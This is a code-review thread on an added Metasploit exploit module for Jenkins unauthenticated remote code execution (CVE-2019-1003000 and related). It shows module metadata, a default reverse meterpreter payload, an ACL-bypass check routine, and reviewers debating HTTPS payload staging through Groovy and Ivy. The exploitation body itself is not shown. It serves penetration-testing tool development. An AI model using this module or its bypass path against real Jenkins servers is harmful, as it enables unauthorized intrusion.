modules/exploits/multi/http/jenkins_metaprogramming.rb

```diff
@@ -0,0 +1,280 @@
+        'wvu'          # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2019-1003000'], # Script Security
+        ['CVE', '2019-1003001'], # Pipeline: Groovy
+        ['CVE', '2019-1003002'], # Pipeline: Declarative
+        ['EDB', '46427'],
+        ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
+        ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
+        ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],
+        ['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc']
+      ],
+      'DisclosureDate' => '2019-01-08', # Public disclosure
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)',
+          'Version'    => Gem::Version.new('2.137')
+        ]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},
+      'Notes'          => {
+        'Stability'    => [CRASH_SAFE],
+        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+        'Reliability'  => [REPEATABLE_SESSION]
+      },
+      'Stance'         => Stance::Aggressive # Be aggressive, b-e aggressive!
+    ))
+
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+
+    deregister_options('URIPATH')
+  end
+
+=begin
+  http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]
+=end
+  def check
+    checkcode = CheckCode::Safe
+
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => go_go_gadget1('/search/index'),
+      'vars_get' => {'q' => 'a'}
+    )
+
+    unless res && (version = res.headers['X-Jenkins'])
+      vprint_error('Jenkins not detected')
+      return CheckCode::Unknown
+    end
+
+    vprint_status("Jenkins #{version} detected")
+    checkcode = CheckCode::Detected
+
+    if Gem::Version.new(version) > target['Version']
+      vprint_error("Jenkins #{version} is not a supported target")
+      return CheckCode::Safe
+    end
+
+    vprint_good("Jenkins #{version} is a supported target")
+    checkcode = CheckCode::Appears
+
+    if res.body.include?('Administrator')
+      vprint_good('ACL bypass successful')
+      checkcode = CheckCode::Vulnerable
+    else
+      vprint_error('ACL bypass unsuccessful')
+      return CheckCode::Safe
+    end
+
+    checkcode
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    # NOTE: Staging payloads over HTTPS doesn't work (yet?)
```

Comment:
still no way to have msf serving the jar over HTTPS?

Reply:
Did you see https://github.com/rapid7/metasploit-framework/pull/11466#discussion_r262842887?

I went through all the documentation on the Groovy annotations, but I couldn't find anything. If there's a way in the source, I'll find it, but I'm taking a break for the weekend.

Reply:
I'm reading Groovy core code and Ivy docs right now. Still nothing, but I'm getting closer to the truth.

Reply:
I think we might be on to something.

https://github.com/groovy/groovy-core/blob/01309f9d4be34ddf93c4a9943b5a97843bff6181/src/main/groovy/grape/GrapeIvy.groovy#L637-L638

https://github.com/apache/ant-ivy/blob/4ffcf8f06f238b17e78e8033c3e8278833e452eb/src/java/org/apache/ivy/plugins/resolver/IBiblioResolver.java#L317-L335.

Reply:
Unfortunately, I already tried `m2compatible=true` (default) with HTTPS, and it changed nothing.

Reply:
https://github.com/apache/ant-ivy/blob/master/src/java/org/apache/ivy/util/url/HttpClientHandler.java

https://github.com/apache/ant-ivy/blob/master/src/java/org/apache/ivy/util/url/BasicURLHandler.java

https://github.com/apache/ant-ivy/blob/master/src/java/org/apache/ivy/util/url/AbstractURLHandler.java

Reply:
It doesn't appear to be an SSL/TLS verification issue either. It goes straight to HTTP `HEAD` and `GET`. Closing this unless someone has a better idea and more motivation.